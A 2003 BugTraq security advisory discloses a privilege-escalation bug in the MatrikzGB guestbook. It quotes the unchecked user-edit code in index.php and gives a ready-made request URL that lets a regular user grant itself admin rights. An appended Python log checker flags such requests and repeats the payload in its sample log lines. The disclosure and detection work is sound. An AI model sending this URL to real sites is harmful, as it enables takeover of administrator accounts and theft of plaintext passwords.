BugTraq
Security hole in MatrikzGB Aug 16 2003 01:51AM
Stephan S. (mastamorphixx web de)


Security hole in MatrikzGB Guestbook

15/8/2003

Vulnerable Versions:

Version 2.0 and prior

Version 3 (not tested)

Summary:

MatrikzGB was written by Thomas Hempel for www.onsite.org.

A bug in index.php allows a user with a regular user account to give administrator rights to himself.

Details:

The bug is in the user edit function:

Every regular user is allowed to change rights or make any modifications to existing users.

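    // Excerpt from index.php: runs for any regular user; the caller's rights are not checked
    if ($new_username != "" && $new_password != "") {
        create_user($new_username, $new_password, $new_rights, $entry_index);
        echo "<tr><th class=\"ok\">Der Benutzer wurde angelegt!"; // "The user has been created!"
    }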

Example:

This is an example of how to give administrator rights to yourself.

http://www.target.com/php/gaestebuch/admin/index.php?do=options&action=optionsok&new_username=regularuser&new_password=regularpass&new_rights=admin&user=regularuser&pass=regularpass

Comment:

Once you have administrator rights, you can look up the passwords of all other users; they are in plaintext.

Vendor status:

Vendor has been contacted.

by Stephan "mastamorphixx" S., member of www.lostkey.org

contact: mastamorphixx (at) web (dot) de

irc.euirc.de #lostkey
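
Added example (not part of the original advisory and not MatrikzGB code): a Python log check for administrators of an affected guestbook, flagging user-edit requests to admin/index.php in which an account grants admin rights, and in particular where the requesting user and the edited user are the same. The log format, the sample lines and the rights value "user" are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines (Apache combined-style); hosts, users and the
# rights value "user" are made up for illustration.
SAMPLE_LOG = [
    '192.0.2.10 - - [16/Aug/2003:02:10:11 +0200] "GET /php/gaestebuch/admin/index.php?do=options&action=optionsok&new_username=bob&new_password=x&new_rights=admin&user=bob&pass=x HTTP/1.0" 200 512',
    '192.0.2.20 - - [16/Aug/2003:02:15:40 +0200] "GET /php/gaestebuch/admin/index.php?do=options&action=optionsok&new_username=carol&new_password=y&new_rights=admin&user=root&pass=z HTTP/1.0" 200 512',
    '192.0.2.30 - - [16/Aug/2003:02:16:02 +0200] "GET /php/gaestebuch/index.php?page=2 HTTP/1.0" 200 2048',
    '192.0.2.10 - - [16/Aug/2003:02:20:00 +0200] "GET /php/gaestebuch/admin/index.php?do=options&action=optionsok&new_username=bob&new_password=q&new_rights=user&user=bob&pass=x HTTP/1.0" 200 512',
]

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def classify(line):
    """Return a finding for a user-edit request, or None for anything else."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, target = m.groups()
    url = urlsplit(target)
    q = {k: v[-1] for k, v in parse_qs(url.query, keep_blank_values=True).items()}
    if not url.path.endswith("/admin/index.php") or q.get("action") != "optionsok":
        return None
    # Same precondition as the index.php excerpt: both fields non-empty.
    if not q.get("new_username") or not q.get("new_password"):
        return None
    grants_admin = q.get("new_rights", "").lower() == "admin"
    self_edit = q.get("user") == q["new_username"]
    if grants_admin and self_edit:
        severity = "high"    # an account raised its own rights
    elif grants_admin:
        severity = "review"  # confirm the requester already held admin rights
    else:
        severity = "info"    # user edit without an admin grant
    # Passwords are deliberately left out of the finding.
    return {"client": client, "actor": q.get("user"), "target": q["new_username"],
            "rights": q.get("new_rights"), "severity": severity}


def scan(lines):
    return [f for f in map(classify, lines) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Parameters sent in a POST body do not appear in an access log, and the credentials carried in these URLs do, so the log files themselves need to be handled as sensitive.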
